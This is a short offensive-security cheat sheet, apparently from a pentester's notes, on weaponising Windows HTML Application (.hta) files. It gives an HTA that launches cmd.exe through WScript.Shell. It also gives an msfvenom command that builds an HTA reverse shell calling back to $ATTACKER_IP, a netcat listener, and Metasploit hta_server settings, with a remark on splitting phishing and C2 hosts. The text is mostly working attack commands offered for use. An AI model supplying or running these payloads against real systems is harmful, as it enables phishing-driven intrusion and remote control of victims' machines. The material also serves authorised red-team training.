Windows “HTML Applications” are just HTML files (with the .hta extension) containing JavaScript of VBScript. These are interpreted using the mshta.exe binary; IE and Edge will both helpfully offer to run these files after they’re downloaded.

A simple example that pops a command prompt:

<html>
	<body>
		<script>
			var command = ‘cmd.exe’
			new ActiveXObject(‘WScript.Shell’).Run(command);
		</script>
	</body>
</html>

Create malicious HTA files using Metasploit

Exploit Windows HTML applications with msfvenom

msfvenom can be used to generate HTA refer shells.

msfvenom -p windows/x64/shell_reverse_tcp \
	LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
	-f hta-psh -o ${NAME}.hta

Catch with the standard nc -lvp $ATTACKER_PORT netcat command.

Metasploit can do all of this automatically for us via exploit/windows/misc/hta_server. Critical variables to set:

  • LHOST — the host IP address to connect back to
  • LPORT — the port to connect back to
  • SRVHOST — the host IP address to serve the malicious file on
  • payload — the Metasploit payload to use

In quick-and-dirty cases LHOST and SRVHOST will be the same, though in more sophisticated operations (i.e., if you’re separating phishing and C2 IPs) they will be different. The payload variable is particularly useful, as you can use something like windows/meterpreter/reverse_tcp and get a meterpreter shell, rather than just a plain reverse shell!

Note that you may have to hit “Return” once the file is served to get back to the Metasploit prompt.

Link to original